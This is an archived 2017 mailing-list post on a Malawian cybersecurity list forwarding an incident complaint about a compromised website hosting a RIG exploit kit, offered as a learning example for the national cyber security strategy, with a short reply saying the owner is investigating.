[Cyber-security-tech-mw-l] Fwd: Re: IIDINCIDENT-320592# Exploit Kit activity on 41.216.230.122 - exploitsuniversity.com

Dr Paulos B Nyirenda paulos at sdnp.org.mw
Tue Jan 3 15:41:08 CAT 2017

Here is a cyber security complaint example made by AfricaCERT on behalf United States
Department of Health and Human Services, of a compromised website traced to Malawi that
has a RIG exploit kit placed in it's source code.

We need to be aware of such incidents as we develop the Malawi National Cyber Security
Strategy as we are doing now, can we learn from it?

Regards,

Dr Paulos B Nyirenda
NIC.MW & .mw ccTLD
http://www.registrar.mw

Thanks Very much. He has responded and is investigating. I will call IID later today.
Thanks.
Regards.
Jean-Robert.